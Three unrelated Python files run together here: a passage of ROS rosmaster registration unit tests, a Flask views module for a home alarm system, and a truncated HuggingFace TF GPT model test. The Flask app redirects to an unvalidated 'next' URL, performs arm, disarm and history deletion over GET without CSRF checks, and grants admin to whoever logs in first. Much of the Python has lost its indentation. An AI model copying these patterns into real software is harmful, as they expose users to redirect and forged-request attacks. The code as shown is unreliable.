self.assertEquals(1, code)
self.assertEquals(1, val)
self.failIf('topic2' in r) # test contains
self.assert_(not r)
self.assertEquals([], r.get_state())
def test_Registrations(self):
import rosmaster.exceptions
from rosmaster.registrations import Registrations
types = [Registrations.TOPIC_SUBSCRIPTIONS,
Registrations.TOPIC_PUBLICATIONS,
Registrations.SERVICE,
Registrations.PARAM_SUBSCRIPTIONS]
# test enums
self.assertEquals(4, len(set(types)))
try:
r = Registrations(-1)
self.fail("Registrations accepted invalid type")
except rosmaster.exceptions.InternalException: pass
for t in types:
r = Registrations(t)
self.assertEquals(t, r.type)
self.assert_(not r) #test nonzero
self.failIf('topic1' in r) #test contains
self.failIf(r.has_key('topic1')) #test has_key
self.failIf([k for k in r.iterkeys()]) #no keys
self.assertEquals(None, r.get_service_api('non-existent'))
        # run the shared subtests against each registration type
r = Registrations(Registrations.TOPIC_SUBSCRIPTIONS)
self._subtest_Registrations_basic(r)
r = Registrations(Registrations.TOPIC_PUBLICATIONS)
self._subtest_Registrations_basic(r)
r = Registrations(Registrations.PARAM_SUBSCRIPTIONS)
self._subtest_Registrations_basic(r)
r = Registrations(Registrations.SERVICE)
self._subtest_Registrations_services(r)
def test_RegistrationManager_services(self):
from rosmaster.registrations import Registrations, RegistrationManager
rm = RegistrationManager(ThreadPoolMock())
self.assertEquals(None, rm.get_node('caller1'))
# do an unregister first, before service_api is initialized
code, msg, val = rm.unregister_service('s1', 'caller1', 'rosrpc://one:1234')
self.assertEquals(1, code)
self.assertEquals(0, val)
rm.register_service('s1', 'caller1', 'http://one:1234', 'rosrpc://one:1234')
self.assert_(rm.services.has_key('s1'))
self.assertEquals('rosrpc://one:1234', rm.services.get_service_api('s1'))
self.assertEquals('http://one:1234', rm.get_node('caller1').api)
self.assertEquals([['s1', ['caller1']]], rm.services.get_state())
# - verify that changed caller_api updates ref
rm.register_service('s1', 'caller1', 'http://oneB:1234', 'rosrpc://one:1234')
self.assert_(rm.services.has_key('s1'))
self.assertEquals('rosrpc://one:1234', rm.services.get_service_api('s1'))
self.assertEquals('http://oneB:1234', rm.get_node('caller1').api)
self.assertEquals([['s1', ['caller1']]], rm.services.get_state())
# - verify that changed service_api updates ref
rm.register_service('s1', 'caller1', 'http://oneB:1234', 'rosrpc://oneB:1234')
self.assert_(rm.services.has_key('s1'))
self.assertEquals('rosrpc://oneB:1234', rm.services.get_service_api('s1'))
self.assertEquals('http://oneB:1234', rm.get_node('caller1').api)
self.assertEquals([['s1', ['caller1']]], rm.services.get_state())
rm.register_service('s2', 'caller2', 'http://two:1234', 'rosrpc://two:1234')
self.assertEquals('http://two:1234', rm.get_node('caller2').api)
# - unregister should be noop if service api does not match
code, msg, val = rm.unregister_service('s2', 'caller2', 'rosrpc://b:1234')
self.assertEquals(1, code)
self.assertEquals(0, val)
self.assert_(rm.services.has_key('s2'))
self.assertEquals('http://two:1234', rm.get_node('caller2').api)
self.assertEquals('rosrpc://two:1234', rm.services.get_service_api('s2'))
# - unregister should be noop if service is unknown
code, msg, val = rm.unregister_service('unknown', 'caller2', 'rosrpc://two:1234')
self.assertEquals(1, code)
self.assertEquals(0, val)
self.assert_(rm.services.has_key('s2'))
self.assertEquals('http://two:1234', rm.get_node('caller2').api)
self.assertEquals('rosrpc://two:1234', rm.services.get_service_api('s2'))
# - unregister should clear all knowledge of caller2
        code, msg, val = rm.unregister_service('s2', 'caller2', 'rosrpc://two:1234')
self.assertEquals(1, code)
self.assertEquals(1, val)
self.assert_(rm.services.has_key('s1'))
self.failIf(rm.services.has_key('s2'))
self.assertEquals(None, rm.get_node('caller2'))
code, msg, val = rm.unregister_service('s1', 'caller1', 'rosrpc://oneB:1234')
self.assertEquals(1, code)
self.assertEquals(1, val)
self.assert_(not rm.services.__nonzero__())
self.failIf(rm.services.has_key('s1'))
self.assertEquals(None, rm.get_node('caller1'))
def test_RegistrationManager_topic_pub(self):
from rosmaster.registrations import Registrations, RegistrationManager
rm = RegistrationManager(ThreadPoolMock())
self.subtest_RegistrationManager(rm, rm.publishers, rm.register_publisher, rm.unregister_publisher)
def test_RegistrationManager_topic_sub(self):
from rosmaster.registrations import Registrations, RegistrationManager
rm = RegistrationManager(ThreadPoolMock())
self.subtest_RegistrationManager(rm, rm.subscribers, rm.register_subscriber, rm.unregister_subscriber)
def test_RegistrationManager_param_sub(self):
from rosmaster.registrations import Registrations, RegistrationManager
rm = RegistrationManager(ThreadPoolMock())
self.subtest_RegistrationManager(rm, rm.param_subscribers, rm.register_param_subscriber, rm.unregister_param_subscriber)
def subtest_RegistrationManager(self, rm, r, register, unregister):
self.assertEquals(None, rm.get_node('caller1'))
register('key1', 'caller1', 'http://one:1234')
self.assert_(r.has_key('key1'))
self.assertEquals('http://one:1234', rm.get_node('caller1').api)
self.assertEquals([['key1', ['caller1']]], r.get_state())
# - verify that changed caller_api updates ref
register('key1', 'caller1', 'http://oneB:1234')
self.assert_(r.has_key('key1'))
self.assertEquals('http://oneB:1234', rm.get_node('caller1').api)
self.assertEquals([['key1', ['caller1']]], r.get_state())
register('key2', 'caller2', 'http://two:1234')
self.assertEquals('http://two:1234', rm.get_node('caller2').api)
# - unregister should be noop if caller api does not match
code, msg, val = unregister('key2', 'caller2', 'http://b:1234')
self.assertEquals(1, code)
self.assertEquals(0, val)
self.assertEquals('http://two:1234', rm.get_node('caller2').api)
# - unregister should be noop if key is unknown
code, msg, val = unregister('unknown', 'caller2', 'http://two:1234')
self.assertEquals(1, code)
self.assertEquals(0, val)
self.assert_(r.has_key('key2'))
self.assertEquals('http://two:1234', rm.get_node('caller2').api)
# - unregister should be noop if unknown node
code, msg, val = rm.unregister_publisher('key2', 'unknown', 'http://unknown:1')
self.assertEquals(1, code)
self.assertEquals(0, val)
self.assert_(r.has_key('key2'))
# - unregister should clear all knowledge of caller2
        code, msg, val = unregister('key2', 'caller2', 'http://two:1234')
self.assertEquals(1, code)
self.assertEquals(1, val)
self.assert_(r.has_key('key1'))
self.failIf(r.has_key('key2'))
self.assertEquals(None, rm.get_node('caller2'))
code, msg, val = unregister('key1', 'caller1', 'http://oneB:1234')
self.assertEquals(1, code)
self.assertEquals(1, val)
self.assert_(not r.__nonzero__())
self.failIf(r.has_key('key1'))
self.assertEquals(None, rm.get_node('caller1'))
def test_RegistrationManager_base(self):
import rosmaster.exceptions
from rosmaster.registrations import Registrations, RegistrationManager
threadpool = ThreadPoolMock()
rm = RegistrationManager(threadpool)
self.assert_(isinstance(rm.services, Registrations))
self.assertEquals(Registrations.SERVICE, rm.services.type)
self.assert_(isinstance(rm.param_subscribers, Registrations))
self.assertEquals(Registrations.PARAM_SUBSCRIPTIONS, rm.param_subscribers.type)
self.assert_(isinstance(rm.subscribers, Registrations))
self.assertEquals(Registrations.TOPIC_SUBSCRIPTIONS, rm.subscribers.type)
        self.assert_(isinstance(rm.publishers, Registrations))
        self.assertEquals(Registrations.TOPIC_PUBLICATIONS, rm.publishers.type)
#test auto-clearing of registrations if node API changes
rm.register_publisher('pub1', 'caller1', 'http://one:1')
rm.register_publisher('pub1', 'caller2', 'http://two:1')
rm.register_publisher('pub1', 'caller3', 'http://three:1')
rm.register_subscriber('sub1', 'caller1', 'http://one:1')
rm.register_subscriber('sub1', 'caller2', 'http://two:1')
rm.register_subscriber('sub1', 'caller3', 'http://three:1')
rm.register_param_subscriber('p1', 'caller1', 'http://one:1')
rm.register_param_subscriber('p1', 'caller2', 'http://two:1')
rm.register_param_subscriber('p1', 'caller3', 'http://three:1')
rm.register_service('s1', 'caller1', 'http://one:1', 'rosrpc://one:1')
self.assertEquals('http://one:1', rm.get_node('caller1').api)
self.assertEquals('http://two:1', rm.get_node('caller2').api)
self.assertEquals('http://three:1', rm.get_node('caller3').api)
# - first, make sure that changing rosrpc URI does not erase state
rm.register_service('s1', 'caller1', 'http://one:1', 'rosrpc://oneB:1')
n = rm.get_node('caller1')
self.assertEquals(['pub1'], n.topic_publications)
self.assertEquals(['sub1'], n.topic_subscriptions)
self.assertEquals(['p1'], n.param_subscriptions)
self.assertEquals(['s1'], n.services)
self.assert_('http://one:1' in rm.publishers.get_apis('pub1'))
self.assert_('http://one:1' in rm.subscribers.get_apis('sub1'))
self.assert_('http://one:1' in rm.param_subscribers.get_apis('p1'))
self.assert_('http://one:1' in rm.services.get_apis('s1'))
# - also, make sure unregister does not erase state if API changed
rm.unregister_publisher('pub1', 'caller1', 'http://not:1')
self.assert_('http://one:1' in rm.publishers.get_apis('pub1'))
rm.unregister_subscriber('sub1', 'caller1', 'http://not:1')
self.assert_('http://one:1' in rm.subscribers.get_apis('sub1'))
rm.unregister_param_subscriber('p1', 'caller1', 'http://not:1')
self.assert_('http://one:1' in rm.param_subscribers.get_apis('p1'))
        rm.unregister_service('s1', 'caller1', 'rosrpc://not:1')
self.assert_('http://one:1' in rm.services.get_apis('s1'))
# erase caller1 sub/srvs/params via register_publisher
rm.register_publisher('pub1', 'caller1', 'http://newone:1')
self.assertEquals('http://newone:1', rm.get_node('caller1').api)
# - check node ref
n = rm.get_node('caller1')
self.assertEquals(['pub1'], n.topic_publications)
self.assertEquals([], n.services)
self.assertEquals([], n.topic_subscriptions)
self.assertEquals([], n.param_subscriptions)
# - checks publishers
self.assert_('http://newone:1' in rm.publishers.get_apis('pub1'))
# - checks subscribers
self.assert_(rm.subscribers.has_key('sub1'))
self.failIf('http://one:1' in rm.subscribers.get_apis('sub1'))
# - checks param subscribers
self.assert_(rm.param_subscribers.has_key('p1'))
self.failIf('http://one:1' in rm.param_subscribers.get_apis('p1'))
# erase caller2 pub/sub/params via register_service
# - initial state
self.assert_('http://two:1' in rm.publishers.get_apis('pub1'))
self.assert_('http://two:1' in rm.subscribers.get_apis('sub1'))
self.assert_('http://two:1' in rm.param_subscribers.get_apis('p1'))
# - change ownership of s1 to caller2
rm.register_service('s1', 'caller2', 'http://two:1', 'rosrpc://two:1')
self.assert_('http://two:1' in rm.services.get_apis('s1'))
self.assert_('http://two:1' in rm.publishers.get_apis('pub1'))
self.assert_('http://two:1' in rm.subscribers.get_apis('sub1'))
self.assert_('http://two:1' in rm.param_subscribers.get_apis('p1'))
rm.register_service('s1', 'caller2', 'http://newtwo:1', 'rosrpc://newtwo:1')
self.assertEquals('http://newone:1', rm.get_node('caller1').api)
# - check node ref
n = rm.get_node('caller2')
self.assertEquals([], n.topic_publications)
self.assertEquals(['s1'], n.services)
self.assertEquals([], n.topic_subscriptions)
self.assertEquals([], n.param_subscriptions)
# - checks publishers
self.assert_(rm.publishers.has_key('pub1'))
self.failIf('http://two:1' in rm.publishers.get_apis('pub1'))
# - checks subscribers
self.assert_(rm.subscribers.has_key('sub1'))
self.failIf('http://two:1' in rm.subscribers.get_apis('sub1'))
self.assertEquals([['sub1', ['caller3']]], rm.subscribers.get_state())
# - checks param subscribers
self.assert_(rm.param_subscribers.has_key('p1'))
self.failIf('http://two:1' in rm.param_subscribers.get_apis('p1'))
self.assertEquals([['p1', ['caller3']]], rm.param_subscribers.get_state())
def test_Registrations_unregister_all(self):
import rosmaster.exceptions
from rosmaster.registrations import Registrations
r = Registrations(Registrations.TOPIC_SUBSCRIPTIONS)
for k in ['topic1', 'topic1b', 'topic1c', 'topic1d']:
r.register(k, 'node1', 'http://node1:5678')
r.register('topic2', 'node2', 'http://node2:5678')
r.unregister_all('node1')
self.failIf(not r)
for k in ['topic1', 'topic1b', 'topic1c', 'topic1d']:
self.failIf(r.has_key(k))
self.assertEquals(['topic2'], [k for k in r.iterkeys()])
r = Registrations(Registrations.TOPIC_PUBLICATIONS)
for k in ['topic1', 'topic1b', 'topic1c', 'topic1d']:
r.register(k, 'node1', 'http://node1:5678')
r.register('topic2', 'node2', 'http://node2:5678')
r.unregister_all('node1')
self.failIf(not r)
for k in ['topic1', 'topic1b', 'topic1c', 'topic1d']:
self.failIf(r.has_key(k))
self.assertEquals(['topic2'], [k for k in r.iterkeys()])
r = Registrations(Registrations.PARAM_SUBSCRIPTIONS)
r.register('param2', 'node2', 'http://node2:5678')
for k in ['param1', 'param1b', 'param1c', 'param1d']:
r.register(k, 'node1', 'http://node1:5678')
r.unregister_all('node1')
self.failIf(not r)
for k in ['param1', 'param1b', 'param1c', 'param1d']:
self.failIf(r.has_key(k))
self.assertEquals(['param2'], [k for k in r.iterkeys()])
r = Registrations(Registrations.SERVICE)
for k in ['service1', 'service1b', 'service1c', 'service1d']:
r.register(k, 'node1', 'http://node1:5678', 'rosrpc://node1:1234')
r.register('service2', 'node2', 'http://node2:5678', 'rosrpc://node2:1234')
r.unregister_all('node1')
self.failIf(not r)
for k in ['service1', 'service1b', 'service1c', 'service1d']:
self.failIf(r.has_key(k))
self.assertEquals(None, r.get_service_api(k))
self.assertEquals(['service2'], [k for k in r.iterkeys()])
self.assertEquals('rosrpc://node2:1234', r.get_service_api('service2'))
def _subtest_Registrations_services(self, r):
import rosmaster.exceptions
# call methods that use service_api_map, make sure they are guarded against lazy-init
self.assertEquals(None, r.get_service_api('s1'))
r.unregister_all('node1')
# do an unregister first, before service_api is initialized
code, msg, val = r.unregister('s1', 'caller1', None, 'rosrpc://one:1234')
self.assertEquals(1, code)
self.assertEquals(0, val)
try:
r.register('service1', 'node1', 'http://node1:5678')
self.fail("should require service_api")
except rosmaster.exceptions.InternalException: pass
r.register('service1', 'node1', 'http://node1:5678', 'rosrpc://node1:1234')
self.assert_('service1' in r) # test contains
self.assert_(r.has_key('service1')) # test contains
self.assertEquals(['service1'], [k for k in r.iterkeys()])
self.assertEquals(['http://node1:5678'], r.get_apis('service1'))
self.assertEquals('rosrpc://node1:1234', r.get_service_api('service1'))
self.assertEquals([('node1', 'http://node1:5678')], r['service1'])
self.failIf(not r) #test nonzero
self.assertEquals([['service1', ['node1']]], r.get_state())
r.register('service1', 'node2', 'http://node2:5678', 'rosrpc://node2:1234')
self.assertEquals(['service1'], [k for k in r.iterkeys()])
self.assertEquals('rosrpc://node2:1234', r.get_service_api('service1'))
self.assertEquals(['http://node2:5678'], r.get_apis('service1'))
self.assertEquals([('node2', 'http://node2:5678')], r['service1'])
self.assertEquals([['service1', ['node2']]], r.get_state())
# register a second service
r.register('service2', 'node3', 'http://node3:5678', 'rosrpc://node3:1234')
self.assertEquals('rosrpc://node3:1234', r.get_service_api('service2'))
self.assertEquals(2, len(r.get_state()))
self.assert_(['service2', ['node3']] in r.get_state(), r.get_state())
self.assert_(['service1', ['node2']] in r.get_state())
# register a third service, second service for node2
r.register('service1b', 'node2', 'http://node2:5678', 'rosrpc://node2:1234')
self.assertEquals(3, len(r.get_state()))
self.assert_(['service2', ['node3']] in r.get_state())
self.assert_(['service1b', ['node2']] in r.get_state())
self.assert_(['service1', ['node2']] in r.get_state())
# Unregister
try:
r.unregister('service1', 'node2', 'http://node2:1234')
self.fail("service_api param must be specified")
except rosmaster.exceptions.InternalException: pass
# - fail if service is not known
        code, _, val = r.unregister('unknown', 'node2', 'http://node2:5678', 'rosrpc://node2:1234')
self.assertEquals(0, val)
# - fail if node is not registered
code, _, val = r.unregister('service1', 'node3', 'http://node3:5678', 'rosrpc://node3:1234')
self.assertEquals(0, val)
# - fail if service API is different
code, _, val = r.unregister('service1', 'node2', 'http://node2b:5678', 'rosrpc://node3:1234')
self.assertEquals(0, val)
# - unregister service2
code, _, val = r.unregister('service2', 'node3', 'http://node3:5678', 'rosrpc://node3:1234')
self.assertEquals(1, code)
self.assertEquals(1, val)
self.failIf('service2' in r) # test contains
self.failIf(r.has_key('service2'))
self.assert_('service1' in [k for k in r.iterkeys()])
self.assert_('service1b' in [k for k in r.iterkeys()])
self.assertEquals([], r.get_apis('service2'))
self.assertEquals([], r['service2'])
self.failIf(not r) #test nonzero
self.assertEquals(2, len(r.get_state()))
self.failIf(['service2', ['node3']] in r.get_state())
# - unregister node2
code, _, val = r.unregister('service1', 'node2', 'http://node2:5678', 'rosrpc://node2:1234')
self.assertEquals(1, code)
self.assertEquals(1, val)
self.failIf('service1' in r) # test contains
self.failIf(r.has_key('service1'))
self.assertEquals(['service1b'], [k for k in r.iterkeys()])
self.assertEquals([], r.get_apis('service1'))
self.assertEquals([], r['service1'])
self.failIf(not r) #test nonzero
self.assertEquals([['service1b', ['node2']]], r.get_state())
code, _, val = r.unregister('service1b', 'node2', 'http://node2:5678', 'rosrpc://node2:1234')
self.assertEquals(1, code)
self.assertEquals(1, val)
self.failIf('service1' in r) # test contains
self.failIf(r.has_key('service1'))
self.assertEquals([], [k for k in r.iterkeys()])
self.assertEquals([], r.get_apis('service1'))
self.assertEquals([], r['service1'])
self.assert_(not r) #test nonzero
self.assertEquals([], r.get_state())
|
|
#flask imports
from flask import render_template, flash, redirect, session, url_for, request, g
from flask.ext.login import login_user, logout_user, current_user, login_required
#app stuff
from app import app, db, lm, oid, models, admin
from flask.ext.admin.contrib.sqlamodel import ModelView
from flask.ext.admin.base import MenuLink, Admin, BaseView, expose
#import forms Flask.wtf
from forms import LoginForm
#import database models for FlaskAlchemy
from models import User, Zones, History, AlarmStatus, ValidUsers, Settings, Email
from models import ROLE_USER, ROLE_ADMIN
#import python extensions
from datetime import datetime
import re
import subprocess
#globals
SystemArmed = False
def CheckProcessRunning(process):
"""This function checks that alarmlogic.py is running, since it builds the db and keeps information up to date."""
s = subprocess.Popen(["ps", "axw"],stdout=subprocess.PIPE)
for x in s.stdout:
if re.search(process, x):
return True
return False
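# Usage sketch: CheckProcessRunning('alarmlogic.py') scans the output of "ps axw"
# for the given pattern and returns True if a matching process line is found; the
# commented-out block in before_request() below shows the intended call site.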
#User Loader Callback -
@lm.user_loader
def load_user(id):
return User.query.get(int(id))
#functions decorated with @app.before_request run before each request
@app.before_request
def before_request():
    g.user = current_user #copy the flask-login current user into the g global object
    #TODO: only check the process if the content is not static content, i.e. they want to go to a page that needs alarmlogic.
#note: this might slow down the UI! maybe just check on login page? we would like to know if the process crashes though...
# if CheckProcessRunning('alarmlogic.py') == False:
#check request url to avoid redirect loop (rightmost 10 chars)
# if request.path <> url_for('notrunning') and request.path[:7] <> '/static' and request.path[:8] <> '/favicon':
# return redirect(url_for('notrunning'))
# else:
#user refreshed after starting app
# if request.url[-10:] == url_for('notrunning')[-10:]:
# return redirect(url_for('index'))
#handle 404 nicely
@app.errorhandler(404)
def not_found_error(error):
return render_template('404.html'), 404
#handle 500 nicely
@app.errorhandler(500)
def internal_error(error):
db.session.rollback()
return render_template('500.html'), 500
#default route
@app.route('/', methods = ['GET', 'POST'])
#index route
@app.route('/index', methods = ['GET', 'POST'])
@login_required
def index():
#get armed status from database.
armed = AlarmStatus.query.filter_by(attribute = 'Armed').first()
    ArmedStatus = (armed.value == '1')
#notify user if a zone is not secured (but don't keep them from arming with that status)
zonesbreached = Zones.query.filter_by(secured = 0).first()
if zonesbreached is None:
flash('All zones secured.')
else:
flash('One or more zones not secured.')
return render_template('index.html',
title = 'Overview', ArmedStatus = ArmedStatus)
#alarmlogic.py not running
@app.route('/notrunning')
def notrunning():
    #TODO: Allow user to (re)start alarmlogic.py if logged in?
return render_template('notrunning.html',title = 'Doh. ')
#arm the system
@app.route('/arm')
@login_required
def arm():
armed = AlarmStatus.query.filter_by(attribute = 'Armed').first()
armed.value = '1'
db.session.add(armed)
now = datetime.now()
hist = History(source = g.user.nickname, event = 'Armed By User', timestamp = now)
db.session.add(hist)
db.session.commit() #write data
flash('The system has been Armed.')
return redirect(url_for('index'))
#disarm the system
@app.route('/disarm')
@login_required
def disarm():
    #disarm the system (the alarmlogic.py program handles that)
armed = AlarmStatus.query.filter_by(attribute = 'Armed').first()
armed.value = '0'
db.session.add(armed)
now = datetime.now()
hist = History(source = g.user.nickname, event = 'Disarmed By User', timestamp = now)
db.session.add(hist)
db.session.commit() #write data
flash('The system has been Disarmed.')
return redirect(url_for('index'))
#login route
@app.route('/login', methods = ['GET', 'POST'])
@oid.loginhandler
def login():
if g.user is not None and g.user.is_authenticated(): #do we have a valid logged in user?
return redirect(url_for('index')) #redirect to index
form = LoginForm()
if form.validate_on_submit():
session['remember_me'] = form.remember_me.data #store remember me box of form to session variable
return oid.try_login(form.openid.data, ask_for = ['nickname', 'email']) #openID login call
return render_template('login.html',
title = 'Sign In',
form = form,
providers = app.config['OPENID_PROVIDERS'])
@oid.after_login
def after_login(resp):
    #has this user logged in before?
user = User.query.filter_by(email = resp.email).first() #find user in db
    if user is None: #not found: first login for this user, so create an account
        nickname = resp.nickname
        if nickname is None or nickname == "": #build a nickname from the email if null
            nickname = resp.email.split('@')[0]
        #make the very first user an admin for easy setup; later users get the normal role
        user = User(nickname = nickname, email = resp.email, role = ROLE_ADMIN if User.query.first() is None else ROLE_USER)
db.session.add(user)
db.session.commit()
#Add this user to the Email list automatically as well:
emailuser = Email(email = resp.email, html = True)
        db.session.add(emailuser)
db.session.commit()
    # Is the email returned from OpenID valid, and is the user allowed on the system?
    # query the whitelist for this user
    valid_user = ValidUsers.query.filter_by(email = resp.email).first()
    #do we have any valid users yet?
    if ValidUsers.query.first() is None:
        #whitelist is empty: this is the admin logging in for the first time, so grant access
        u = ValidUsers(email = resp.email)
        db.session.add(u)
        db.session.commit()
    #some valid users exist; is this user one of them?
    elif resp.email is None or resp.email == "" or valid_user is None:
        flash('Invalid login. You have not been granted access to this system.')
        return redirect(url_for('login'))
remember_me = False
if 'remember_me' in session: #do we want to remember this user?
remember_me = session['remember_me'] #copy value from session
        session.pop('remember_me', None) #clear the session value now that it has been read
login_user(user, remember = remember_me) #feed flask the user and remember status
    return redirect(request.args.get('next') or url_for('index')) #return the page the user wanted, or index if none requested
#define log out user route
@app.route('/logout')
def logout():
logout_user()
return redirect(url_for('index'))
#define history route
@app.route('/history')
@app.route('/history/<int:page>')
@login_required
def history(page = 1):
#pull paginated history from db... paginate(page,items per page,empty list on error)
    NumNotices = Settings.query.filter_by(attribute = 'NoticesPerPage').first()
    HISTORY = History.query.order_by("timestamp desc").paginate(page, int(NumNotices.value), False)
return render_template('history.html',title = 'History', history = HISTORY,curr_page = page) #pass history to history template
@app.route('/clearhistory')
@login_required
def clearhistory():
    #TODO: History.query.delete() would clear the table in one statement.
    #TODO: Add a confirmation popup or something. Also, this should go on the admin page.
    REMHIST = History.query.all() #pull history data from database
for delhist in REMHIST:
db.session.delete(delhist)
db.session.commit()
flash('History Cleared by User.')
return redirect(url_for('history'))
#define zones route
@app.route('/zones')
@login_required
def zones():
    ZONES = Zones.query.all() #pull zones list from DB
return render_template('zones.html',title = 'Zones',zones = ZONES) #pass ZONE information to zones template
#===================
#flask-Admin Section
#===================
#define custom flask-Admin view
class UserView(ModelView):
# Disable model creation
can_create = False
can_edit = True
can_delete = True
def __init__(self, session, **kwargs):
# You can pass name and other parameters if you want to
super(UserView, self).__init__(User, session, **kwargs)
def is_accessible(self):
if g.user.is_authenticated():
return g.user.role #ROLE_ADMIN == 1, user = 0
else: #anonymous user
return 0
class ZoneView(ModelView):
def __init__(self, session, **kwargs):
# You can pass name and other parameters if you want to
super(ZoneView, self).__init__(Zones, session, **kwargs)
def is_accessible(self):
if g.user.is_authenticated():
return g.user.role #ROLE_ADMIN == 1, user = 0
else: #anonymous user
return 0
class ValidUsersView(ModelView):
def __init__(self, session, **kwargs):
# You can pass name and other parameters if you want to
super(ValidUsersView, self).__init__(ValidUsers, session, **kwargs)
def is_accessible(self):
if g.user.is_authenticated():
return g.user.role #ROLE_ADMIN == 1, user = 0
else: #anonymous user
return 0
class SettingsView(ModelView):
def __init__(self, session, **kwargs):
# You can pass name and other parameters if you want to
super(SettingsView, self).__init__(Settings, session, **kwargs)
def is_accessible(self):
if g.user.is_authenticated():
return g.user.role #ROLE_ADMIN == 1, user = 0
else: #anonymous user
return 0
class EmailView(ModelView):
def __init__(self, session, **kwargs):
# You can pass name and other parameters if you want to
super(EmailView, self).__init__(Email, session, **kwargs)
def is_accessible(self):
if g.user.is_authenticated():
return g.user.role #ROLE_ADMIN == 1, user = 0
else: #anonymous user
return 0
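#The five admin views above duplicate the same access check; a shared mixin
#could remove that repetition (sketch only, not wired in -- each view would
#inherit it ahead of ModelView):
#class AdminAccessMixin(object):
#    def is_accessible(self):
#        #ROLE_ADMIN == 1 grants access; plain users (0) and anonymous visitors do not
#        return g.user.role if g.user.is_authenticated() else 0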
#add flask admin views
admin.add_view(UserView(db.session))
admin.add_view(ZoneView(db.session))
admin.add_view(ValidUsersView(db.session))
admin.add_view(SettingsView(db.session))
admin.add_view(EmailView(db.session))
admin.add_link(MenuLink(name='Clear History', url='/clearhistory'))
admin.add_link(MenuLink(name='Exit Admin', url='/'))
|
|
# coding=utf-8
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from transformers import OpenAIGPTConfig, is_tf_available
from transformers.testing_utils import require_tf, slow
from .test_configuration_common import ConfigTester
from .test_modeling_tf_common import TFModelTesterMixin, ids_tensor
if is_tf_available():
import tensorflow as tf
from transformers.models.openai.modeling_tf_openai import (
TF_OPENAI_GPT_PRETRAINED_MODEL_ARCHIVE_LIST,
TFOpenAIGPTDoubleHeadsModel,
TFOpenAIGPTForSequenceClassification,
TFOpenAIGPTLMHeadModel,
TFOpenAIGPTModel,
)
class TFOpenAIGPTModelTester:
def __init__(
self,
parent,
):
self.parent = parent
self.batch_size = 13
self.seq_length = 7
self.is_training = True
self.use_token_type_ids = True
self.use_input_mask = True
self.use_labels = True
self.use_mc_token_ids = True
self.vocab_size = 99
self.hidden_size = 32
self.num_hidden_layers = 5
self.num_attention_heads = 4
self.intermediate_size = 37
self.hidden_act = "gelu"
self.hidden_dropout_prob = 0.1
self.attention_probs_dropout_prob = 0.1
self.max_position_embeddings = 512
self.type_vocab_size = 16
self.type_sequence_label_size = 2
self.initializer_range = 0.02
self.num_labels = 3
self.num_choices = 4
self.scope = None
self.pad_token_id = self.vocab_size - 1
def prepare_config_and_inputs(self):
input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size)
input_mask = None
if self.use_input_mask:
input_mask = ids_tensor([self.batch_size, self.seq_length], vocab_size=2)
token_type_ids = None
if self.use_token_type_ids:
token_type_ids = ids_tensor([self.batch_size, self.seq_length], self.type_vocab_size)
mc_token_ids = None
if self.use_mc_token_ids:
mc_token_ids = ids_tensor([self.batch_size, self.num_choices], self.seq_length)
sequence_labels = None
token_labels = None
choice_labels = None
if self.use_labels:
sequence_labels = ids_tensor([self.batch_size], self.type_sequence_label_size)
token_labels = ids_tensor([self.batch_size, self.seq_length], self.num_labels)
choice_labels = ids_tensor([self.batch_size], self.num_choices)
config = OpenAIGPTConfig(
vocab_size=self.vocab_size,
n_embd=self.hidden_size,
n_layer=self.num_hidden_layers,
n_head=self.num_attention_heads,
# intermediate_size=self.intermediate_size,
# hidden_act=self.hidden_act,
# hidden_dropout_prob=self.hidden_dropout_prob,
# attention_probs_dropout_prob=self.attention_probs_dropout_prob,
n_positions=self.max_position_embeddings,
n_ctx=self.max_position_embeddings,
# type_vocab_size=self.type_vocab_size,
# initializer_range=self.initializer_range,
pad_token_id=self.pad_token_id,
)
head_mask = ids_tensor([self.num_hidden_layers, self.num_attention_heads], 2)
return (
config,
input_ids,
input_mask,
head_mask,
token_type_ids,
mc_token_ids,
sequence_labels,
token_labels,
choice_labels,
)
def create_and_check_openai_gpt_model(self, config, input_ids, input_mask, head_mask, token_type_ids, *args):
model = TFOpenAIGPTModel(config=config)
inputs = {"input_ids": input_ids, "attention_mask": input_mask, "token_type_ids": token_type_ids}
result = model(inputs)
inputs = [input_ids, input_mask]
result = model(inputs)
result = model(input_ids)
self.parent.assertEqual(result.last_hidden_state.shape, (self.batch_size, self.seq_length, self.hidden_size))
def create_and_check_openai_gpt_lm_head(self, config, input_ids, input_mask, head_mask, token_type_ids, *args):
model = TFOpenAIGPTLMHeadModel(config=config)
inputs = {"input_ids": input_ids, "attention_mask": input_mask, "token_type_ids": token_type_ids}
result = model(inputs)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.seq_length, self.vocab_size))
def create_and_check_openai_gpt_double_head(
self, config, input_ids, input_mask, head_mask, token_type_ids, mc_token_ids, *args
):
model = TFOpenAIGPTDoubleHeadsModel(config=config)
multiple_choice_inputs_ids = tf.tile(tf.expand_dims(input_ids, 1), (1, self.num_choices, 1))
multiple_choice_input_mask = tf.tile(tf.expand_dims(input_mask, 1), (1, self.num_choices, 1))
multiple_choice_token_type_ids = tf.tile(tf.expand_dims(token_type_ids, 1), (1, self.num_choices, 1))
inputs = {
"input_ids": multiple_choice_inputs_ids,
"mc_token_ids": mc_token_ids,
"attention_mask": multiple_choice_input_mask,
"token_type_ids": multiple_choice_token_type_ids,
}
result = model(inputs)
self.parent.assertEqual(
result.logits.shape, (self.batch_size, self.num_choices, self.seq_length, self.vocab_size)
)
self.parent.assertEqual(result.mc_logits.shape, (self.batch_size, self.num_choices))
def create_and_check_openai_gpt_for_sequence_classification(
self, config, input_ids, input_mask, head_mask, token_type_ids, *args
):
config.num_labels = self.num_labels
sequence_labels = ids_tensor([self.batch_size], self.type_sequence_label_size)
inputs = {
"input_ids": input_ids,
"attention_mask": input_mask,
"token_type_ids": token_type_ids,
"labels": sequence_labels,
}
model = TFOpenAIGPTForSequenceClassification(config)
result = model(inputs)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.num_labels))
def prepare_config_and_inputs_for_common(self):
config_and_inputs = self.prepare_config_and_inputs()
(
config,
input_ids,
input_mask,
head_mask,
